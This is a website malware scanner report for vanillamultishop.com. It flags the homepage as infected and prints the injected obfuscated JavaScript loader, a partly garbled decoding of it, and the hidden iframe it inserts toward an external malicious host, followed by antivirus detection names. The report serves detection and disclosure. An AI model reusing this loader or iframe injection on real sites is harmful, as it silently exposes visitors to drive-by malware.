New scan:

Malware Scanner report for vanillamultishop.com

Malicious/Suspicious/Total urls checked
1/0/2
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/1
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.vanillamultishop.com/
200 OK
Content-Length: 38732
Content-Type: text/plain
malicious
Malicious code - confirmed by antiviruses (see below)

aa=(document['getElementsByTagName']+'').substr(2-1,4);if((aa=="func")||(aa=="unct")){ss="";s=String;e=window['e'+'val'];t='b';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=(ddd-d2)*-1;n="4.5b4.5b52.5b51b16b20b50b55.5b49.5b58.5b54.5b50.5b55b58b23b51.5b50.5b58b34.5b54b50.5b54.5b50.5b55b58b57.5b33b60.5b42b48.5b51.5b39b48.5b54.5b50.5b20b19.5b49b55.5b50b60.5b19.5b20.5b45.5b24b46.5b20.5b61.5b4.5b4.5b4.5b52.5b51b57b48.5b54.5b50.5b57b20b20.5b29.5b4.5b4.5b62.5b16b50.5b54b57.5b50.5b16b61.5b4.5b4.5b4.5b5
... 1672 bytes are skipped ...
5b29.5b51b23b57.5b50.5b58b32.5b58b58b57b52.5b49b58.5b58b50.5b20b19.5b52b50.5b52.5b51.5b52b58b19.5b22b19.5b24.5b24b19.5b20.5b29.5b4.5b4.5b4.5b50b55.5b49.5b58.5b54.5b50.5b55b58b23b51.5b50.5b58b34.5b54b50.5b54.5b50.5b55b58b57.5b33b60.5b42b48.5b51.5b39b48.5b54.5b50.5b20b19.5b49b55.5b50b60.5b19.5b20.5b45.5b24b46.5b23b48.5b56b56b50.5b55b50b33.5b52b52.5b54b50b20b51b20.5b29.5b4.5b4.5b62.5";n=n["split"](t);for(i=0;i<n.length;i++)ss+=s['fromCharCode'](-h*n[i]);zx=ss;if((aa=="func")||(aa=="unct"))e(zx);

Decoded script:


asdas
asdas
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
... 11128 bytes are skipped ...
var f = document.createElement('iframe');f.setAttribute('src','http://mindphuc.cu.cc/showthread.php?t=86171563');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); }
<iframe src='http://mindphuc.cu.cc/showthread.php?t=86171563' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>

Antivirus reports:

Ikarus
Trojan.IframeRef
nProtect
JS:Trojan.Iframe.A
K7AntiVirus
Riskware
Emsisoft
JS:Trojan.Iframe.A (B)
McAfee-GW-Edition
Heuristic.BehavesLike.JS.Infected.A
DrWeb
JS.IFrame.151
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/Iframe.V
MicroWorld-eScan
JS:Trojan.Iframe.A
NANO-Antivirus
Trojan.Script.Iframe.rpyhz
F-Secure
JS:Trojan.Iframe.A
F-Prot
JS/IFrame.HC.gen
Norman
IframeRef.DM
GData
JS:Trojan.Iframe.A
Commtouch
JS/IFrame.HC.gen
BitDefender
JS:Trojan.Iframe.A

http://www.vanillamultishop.com/test404page.js
500 Internal Server Error
Content-Length: 1916
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: vanillamultishop.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: vanillamultishop.com
Referer: http://www.google.com/search?q=vanillamultishop.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=vanillamultishop.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vanillamultishop.com/

Result: vanillamultishop.com is not infected or malware details are not published yet.